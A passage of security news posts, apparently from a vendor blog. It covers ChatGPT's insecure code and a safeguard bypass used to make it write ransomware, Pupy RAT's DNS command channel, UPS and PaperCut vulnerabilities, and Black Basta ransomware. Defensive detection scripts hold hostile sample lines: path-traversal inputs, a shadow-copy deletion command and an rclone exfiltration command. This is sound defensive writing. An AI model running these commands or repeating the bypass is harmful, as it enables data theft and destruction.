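    print("naive:", unsafe_resolve("/srv/share", "../../etc/passwd"))
    print("naive:", unsafe_resolve("/srv/share", "/etc/passwd"))
    for name, verdict in demo().items():
        print(f"sanitized: {name!r:28} -> {verdict}")
```

The naive resolver returns /etc/passwd for the absolute name and a “..” chain for the relative one, exactly the inputs a novice never thinks to test. The check is done on the resolved path rather than by stripping “..” from the string, because a symlink inside the share can escape it without any dots in the name at all.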

“Part of the problem seems to be that ChatGPT simply doesn’t assume an adversarial model of execution,” the authors say, explaining why the AI bot cannot create secure code by default. Despite this, the bot readily admits to errors in its code.

“If asked specifically on this topic, the chatbot will provide the user with a cogent explanation of why the code is potentially exploitable. However, any explanatory benefit would only be available to a user who ‘asks the right questions’. i.e.; a security-conscious programmer who queries ChatGPT about security issues.”

Additionally, the authors point to the chatbot’s ethical inconsistency when it refuses to create attack code but will create insecure code.

It might refuse to create attack code, but there are ways round it. Malwarebytes Security Evangelist Mark Stockley decided to try to create ransomware using ChatGPT. The AI bot refused to create malware code at first, but Stockley found his way around the initial safeguards and managed to get it to create (admittedly quite dubious) ransomware anyway.

In an interview with The Register, one of the Université du Québec researchers said he had concerns about ChatGPT. “We have actually already seen students use this, and programmers will use this in the wild,” Khoury said. “So having a tool that generates insecure code is really dangerous. We need to make students aware that if code is generated with this type of tool, it very well might be insecure.”


Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Decoy dog toolkit plays the long game with Pupy RAT

Researchers at Infoblox have discovered a new toolkit being used in the wild called Decoy Dog. It targets enterprises, and has a fondness for deploying a remote access trojan called Pupy RAT.

Activity from the RAT was first noticed earlier this month. Subsequent research revealed that it has been in operation since at least April last year. An initial two domains were being used as Command & Control centers (C2), with almost all of the C2 communications originating from Russia.

From there, further research identified a DNS signature not related to Pupy components. This signature was so unique that its presence indicated not just the open source Pupy RAT, but the Decoy Dog toolkit being used for deployment. Infoblox claims that this unique DNS signature for Decoy Dog “matches less than 0.0000027% of the 370 million active domains on the internet”.

Pupy itself has been seen in numerous nation state attacks and other serious compromises. Back in 2020, it was at the heart of a European electricity association breach. Elsewhere, it was seen as part of a campaign called Magic Hound in 2017, which targeted government and technology sectors in Saudi Arabia.

Pupy RAT is very good at hiding in networks for long periods of time and can infect several platforms including Windows, Linux, and mobile. It communicates with its C2 via DNS. This makes it harder to spot than more common forms of malicious activity due to its tiny footprint. Its open source nature means all manner of changes—such as detecting sandboxes, installing keyloggers, or dumping hashes from a target system—can be made to keep security teams on their toes.

It’s not easy to set up or use: operating the tool effectively requires real skill, along with a working DNS server configuration. This is not your average DIY bedroom-coded malware operation, and anyone using it knows what they’re doing.
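Because the C2 channel is DNS, the place to look for it is resolver logs rather than firewall connection logs. The script below is an added example written for this article, not Infoblox’s Decoy Dog signature (which the article does not reproduce) and not Pupy code: it applies a generic DNS-tunnelling heuristic, flagging registered domains that receive many distinct, long, high-entropy subdomain lookups. The log lines, their ‘timestamp client qname qtype’ layout, and the thresholds are all constructed assumptions for the example.

```python
"""Added example for this article: a heuristic for spotting DNS-based C2 in
resolver logs. Not Infoblox's Decoy Dog signature and not Pupy code; a generic
DNS-tunnelling detector. Log lines below are constructed, in an assumed
'timestamp client qname qtype' format.
"""
import math
from collections import defaultdict
from typing import Dict, List

SAMPLE_DNS_LOG = """\
2023-04-20T10:00:01Z 10.0.0.5 www.example.com A
2023-04-20T10:00:02Z 10.0.0.5 mail.example.com A
2023-04-20T10:00:03Z 10.0.0.5 login.example.com A
2023-04-20T10:00:04Z 10.0.0.9 img1.cdn-static.test A
2023-04-20T10:00:05Z 10.0.0.9 img2.cdn-static.test A
2023-04-20T10:00:06Z 10.0.0.9 img3.cdn-static.test A
2023-04-20T10:00:07Z 10.0.0.9 img4.cdn-static.test A
2023-04-20T10:00:08Z 10.0.0.9 img5.cdn-static.test A
2023-04-20T10:00:09Z 10.0.0.7 0123456789abcdeffedcba9876543210.updates-cdn.test TXT
2023-04-20T10:00:10Z 10.0.0.7 fedcba98765432100123456789abcdef.updates-cdn.test TXT
2023-04-20T10:00:11Z 10.0.0.7 abcdef0123456789fedcba9876543210.updates-cdn.test TXT
2023-04-20T10:00:12Z 10.0.0.7 9876543210fedcbaabcdef0123456789.updates-cdn.test TXT
2023-04-20T10:00:13Z 10.0.0.7 0f1e2d3c4b5a69788796a5b4c3d2e1f0.updates-cdn.test TXT
"""

# Thresholds are assumptions for the example; tune them against your own baseline.
MIN_UNIQUE_NAMES = 5      # distinct query names seen for one registered domain
MIN_AVG_LABEL_LEN = 20    # average length of the leftmost label
MIN_MEAN_ENTROPY = 3.0    # bits per character of the leftmost label


def label_entropy(label: str) -> float:
    """Shannon entropy, in bits per character, of one DNS label."""
    if not label:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Approximate the registered domain as the last two labels.

    Assumption: no public-suffix list is used, so 'example.co.uk' would be
    cut to 'co.uk'; a real deployment should consult one.
    """
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def analyze(log_text: str) -> Dict[str, dict]:
    """Aggregate per registered domain: unique names, clients and label statistics."""
    names: Dict[str, set] = defaultdict(set)
    clients: Dict[str, set] = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # skip malformed lines instead of crashing on them
        _ts, client, qname, _qtype = parts[:4]
        dom = registered_domain(qname)
        names[dom].add(qname.lower())
        clients[dom].add(client)
    stats = {}
    for dom, qnames in names.items():
        first_labels = [q.split(".")[0] for q in qnames]
        stats[dom] = {
            "unique_names": len(qnames),
            "clients": sorted(clients[dom]),
            "avg_label_len": sum(map(len, first_labels)) / len(first_labels),
            "mean_entropy": sum(map(label_entropy, first_labels)) / len(first_labels),
        }
    return stats


def flag_suspicious(stats: Dict[str, dict]) -> List[str]:
    """Domains whose lookups look like encoded data rather than hostnames."""
    return sorted(
        dom for dom, s in stats.items()
        if s["unique_names"] >= MIN_UNIQUE_NAMES
        and s["avg_label_len"] >= MIN_AVG_LABEL_LEN
        and s["mean_entropy"] >= MIN_MEAN_ENTROPY
    )


if __name__ == "__main__":
    result = analyze(SAMPLE_DNS_LOG)
    for dom in flag_suspicious(result):
        print(f"suspicious: {dom} queried by {result[dom]['clients']}")
```

The three conditions are deliberately combined: a CDN also generates many distinct subdomains, but its labels are short and low-entropy, so it is not flagged; only the domain whose labels look like encoded payloads trips all three. The heuristic is a starting point for hunting, not a replacement for a vendor signature.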

There is currently no evidence that any consumer targets have been hit by the Decoy Dog/Pupy RAT combination. So far, everything Infoblox and the other security vendors it has consulted have seen has been enterprise based. This makes sense; it would be rather peculiar to see something of this nature striking out at people in their homes. If you’re not an enterprise or running “large organisational, non-consumer devices”, this isn’t something you’re likely to run into.

Additionally, there’s no data shared on which sector is targeted by the above, so it’s currently impossible to say if it’s one specific realm of business at risk here or if the group behind these installations is picking targets at random. One would suspect the former. While the energy sector shows up in many historical Pupy attacks, that doesn’t mean this is the case here. Investigations into Decoy Dog and Pupy RAT are ongoing, so for now we have to hope that this particular spate of network compromise is still something of a rarity.

Users of Malwarebytes are protected against this threat.



APC warns about critical vulnerabilities in online UPS monitoring software

In a security notification, APC has warned home and corporate users about critical vulnerabilities in the software used to monitor and control their UPS systems online.

APC, which started as American Power Conversion in 1981, is today a part of Schneider Electric™. APC is an industry leader in physical infrastructure and software solutions, and one of the most popular uninterruptible power supply (UPS) brands. The company offers a range of UPS solutions, from home users to industrial control applications.

The monitoring software affected by the vulnerabilities is:

  • APC Easy UPS Online Monitoring Software, V2.5-GA-01-22320 and prior (Windows 10, 11 and Windows Server 2016, 2019, 2022)
  • Schneider Electric Easy UPS Online Monitoring Software, V2.5-GS-01-22320 and prior (Windows 10, 11 and Windows Server 2016, 2019, 2022)

The Easy UPS Online Monitoring Software is used to configure and manage APC and Schneider Electric branded Easy UPS products.

Users of APC Easy UPS Online Monitoring Software (Windows 10) can download a version that includes a fix here.

Users of Schneider Electric Easy UPS Online Monitoring Software (Windows 10) can get a version that includes a fix here.

Failure to apply the remediations may risk remote code execution, escalation of privileges, or authentication bypass, which could result in execution of malicious web code or loss of device functionality.

Any users that choose not to apply the remediation provided above should immediately apply the following general security recommendations to reduce the risk of exploitation:

For Windows (10, 11) and Windows server 2016, 2019, 2022: Customers with direct access to their Easy UPS units should upgrade to PowerChute Serial Shutdown (PCSS) software on all servers protected by the Easy UPS On-Line (SRV, SRVL models).

As general advice, online monitoring tools should sit behind a firewall, with access restricted to those who really need it.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs patched in these updates are:

CVE-2023-29411 CVSS score 9.8 out of 10: A missing authentication for critical function vulnerability exists that could allow changes to administrative credentials, leading to potential remote code execution without requiring prior authentication on the Java RMI interface. Exploiting this vulnerability offers an unauthorized attacker the option to change the administrator login credentials.

CVE-2023-29412 CVSS score 9.8 out of 10: An improper handling of case sensitivity vulnerability exists that could cause remote code execution when manipulating internal methods through the Java RMI interface. The software does not neutralize, or incorrectly neutralizes, special elements, which could lead to remote code execution.

CVE-2023-29413 CVSS score 7.5 out of 10: A missing authentication for critical function vulnerability exists that could cause Denial-of-Service when accessed by an unauthenticated user on the Schneider UPS Monitor service. Generally Denial-of-Service vulnerabilities are not considered serious, but given the importance in some use cases of uninterrupted power supply, the consequences of an outage can be serious.


We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Update your PaperCut application servers now: Exploits in the wild

PaperCut, maker of print management solutions, has urged users of its products to update as soon as possible. Vulnerabilities in unpatched servers are being exploited in the wild, with serious ramifications for any organisation affected.

Two specific vulnerabilities are at the heart of this alert, and are ranked with severity scores of 9.8 (critical) and 8.2 (high) respectively. Full information about the individual security flaws has not been revealed, in order to reduce the likelihood of more attackers making use of them.

Mitigation

At time of writing, both security issues have been addressed with patches. If you update your PaperCut application servers, you are no longer at risk. A recent Shodan search highlights roughly 1,700 instances currently exposed to the internet. These flaws are quite severe, so it’s absolutely worth your time to get things updated as soon as possible.

From the Updating FAQ:

  • Please follow your usual upgrade procedure. Additional links on the ‘Check for updates’ page (accessed through the Admin interface > About > Version info > Check for updates) will allow customers to download fixes for previous major versions which are still supported (e.g. 20.1.7 and 21.2.11) as well as the current version available.
  • If you are using PaperCut MF, we highly recommend following your regular upgrade process. Your PaperCut partner or reseller information can also be found on the ‘About’ tab in the PaperCut admin interface.

If you’re unable to upgrade

PaperCut advises those who are unable to apply the patches to follow the below steps:

  • Block all inbound traffic from external IPs to the web management port (port 9191 and 9192 by default)
  • Block all traffic inbound to the web management portal on the firewall to the server. Note: this will prevent lateral movement from internal hosts but management of the PaperCut service can only be performed on that asset.
  • Apply “Allow list” restrictions under Options > Advanced > Security > Allowed site server IP addresses. Set this to only allow the IP addresses of verified Site Servers on your network. Note this only addresses ZDI-CAN-19226 / PO-1219.

Exploits

The two vulnerabilities in question are:

CVE-2023-27350: This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability.

CVE-2023-27351: This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The issue results from improper implementation of the authentication algorithm. An attacker can leverage this vulnerability to bypass authentication on the system.

In both cases, compromised systems could be used to perform additional exploitation after the initial attack. Arbitrary code can be deployed, or even ransomware if that’s part of the attacker’s toolkit. The relative ease with which these flaws can be exploited is just one reason for the high severity score. Indeed, researchers quickly discovered two types of (legitimate) remote management software being used in these attacks. Such tools give the attacker persistent remote access to the target network, from which they can burrow ever deeper without the affected organisation noticing.

It will probably be a while before all possible patchable installations are running the necessary updates. If you’re potentially affected, do your part and head over to the updates page immediately.



Black Basta ransomware attacks Yellow Pages Canada

The Canadian Yellow Pages Group has confirmed it recently became victim of a cyberattack. The Black Basta ransomware group has claimed responsibility for this attack by posting about Yellow Pages on the “Basta News” leak site.

When such a post shows up, it usually means that negotiations with the victim have stopped and that the ransomware group is getting ready to sell the data it managed to get its hands on during the attack.

Based on the most recent leaked information and an outage of the Yellow Pages website Canada 411 at the beginning of April, it is likely the attack occurred between March 15 and April 7. Attackers using Black Basta have been known to be active on a victim’s network for two to three days before running their ransomware.

Canada is ranked first if you look at the number of ransomware attacks divided by GDP.

Chart: top 10 countries by number of ransomware attacks per $1T GDP

Black Basta is not very different from other ransomware groups in the way it operates. Similar to others, the gang’s attacks frequently begin with initial access gained through phishing attacks. A typical attack might start with an email containing a malicious document in a zip file. Upon extraction, the document installs the Qakbot banking trojan to create backdoor access and deploy SystemBC, which sets up an encrypted connection to a command and control server. From there, CobaltStrike is installed for network reconnaissance and to distribute additional tools.

As is the overarching trend for ransomware groups these days, Black Basta’s primary goal is to steal data so that it can hold the threat of leaked data over its victims. The data is generally stolen using the command line program Rclone, which filters and copies specific files to a cloud service. After the data is copied, the ransomware encrypts files with the “.basta” extension, erases volume shadow copies, and presents a ransom note named readme.txt on affected devices. Attackers using Black Basta may be active on a victim’s network for two to three days before running their ransomware.
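The chain described above leaves telemetry on the endpoint at each stage: an Rclone transfer to a cloud remote, the erasure of volume shadow copies, and files renamed with the “.basta” extension. The script below is an added example written for this article, not a Malwarebytes or vendor detection rule, that matches those three stages against endpoint events and groups hits by host. The events and their field names are a constructed, assumed schema; the shadow-copy command patterns are an assumption about how the deletion is commonly performed, since the article names only the effect.

```python
"""Added example for this article: matching the Black Basta chain (Rclone copy
to a cloud remote, shadow-copy deletion, '.basta' files) against endpoint
telemetry. Illustrative code, not a vendor rule. Events are constructed; the
field names are an assumed schema; the shadow-copy command patterns are an
assumption, as the article names only the effect.
"""
import re
from collections import defaultdict
from typing import Dict, List

SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"type": "process", "host": "fs02", "image": r"C:\Tools\rclone.exe",
     "cmdline": r"rclone.exe copy D:\Finance remote:bucket --transfers 16"},
    {"type": "process", "host": "fs02", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"type": "process", "host": "ws03", "image": r"C:\Program Files\Backup\rclone.exe",
     "cmdline": "rclone.exe version"},  # benign: no transfer verb, no remote
    {"type": "file_rename", "host": "fs02", "path": r"D:\Finance\Q1.xlsx.basta"},
]

# An rclone remote is written as name:path. The name has two or more characters,
# which distinguishes it from a Windows drive letter such as D:\Finance.
RCLONE_REMOTE = re.compile(r"^[A-Za-z][A-Za-z0-9_-]+:\S*$")
RCLONE_TRANSFER_VERBS = {"copy", "sync", "move"}
SHADOW_DELETE = re.compile(
    r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)", re.I)


def match_rules(event: dict) -> List[str]:
    """Return the names of every rule the event satisfies (possibly none)."""
    hits: List[str] = []
    if event["type"] == "process":
        cmd = event.get("cmdline", "")
        tokens = cmd.split()
        image_name = event.get("image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
        is_rclone = image_name == "rclone.exe" or (
            bool(tokens) and tokens[0].lower() in ("rclone", "rclone.exe"))
        if (is_rclone
                and any(t.lower() in RCLONE_TRANSFER_VERBS for t in tokens)
                and any(RCLONE_REMOTE.match(t) for t in tokens[1:])):
            hits.append("rclone_cloud_copy")
        if SHADOW_DELETE.search(cmd):
            hits.append("shadow_copy_deletion")
    elif event["type"] in ("file_create", "file_rename"):
        if event.get("path", "").lower().endswith(".basta"):
            hits.append("basta_extension")
    return hits


def triage(events: List[dict]) -> Dict[str, List[str]]:
    """Group rule hits by host so the analyst sees the chain, not isolated alerts."""
    by_host: Dict[str, set] = defaultdict(set)
    for ev in events:
        for rule in match_rules(ev):
            by_host[ev["host"]].add(rule)
    return {host: sorted(rules) for host, rules in by_host.items()}


def escalate(triaged: Dict[str, List[str]]) -> List[str]:
    """Hosts showing two or more stages of the chain deserve immediate isolation."""
    return sorted(host for host, rules in triaged.items() if len(rules) >= 2)


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for host, rules in result.items():
        print(host, rules)
    print("escalate:", escalate(result))
```

Grouping by host is the useful part: a lone Rclone invocation may be a backup job, and a lone shadow-copy deletion may be an administrator reclaiming disk space, but the two together on the same file server within the two-to-three-day dwell window the article describes are the pattern worth acting on.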

On the leak site, Black Basta provided samples of highly sensitive information about several people. Included are copies of Canadian passports, Quebec and British Columbia driver’s licenses, Régie de l’assurance-maladie du Québec (RAMQ health insurance) cards, and a tax return containing one individual’s social insurance number.

Franco Sciannamblo, YP’s Senior Vice President and Chief Financial Officer, commented in a statement to BleepingComputer:

“Based on our investigation to date, we have reason to believe that the unauthorized third party stole certain personal information from servers containing YP employee data and limited data relating to our business customers.”

All impacted individuals and the appropriate privacy regulatory authorities have been notified about the attack.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.
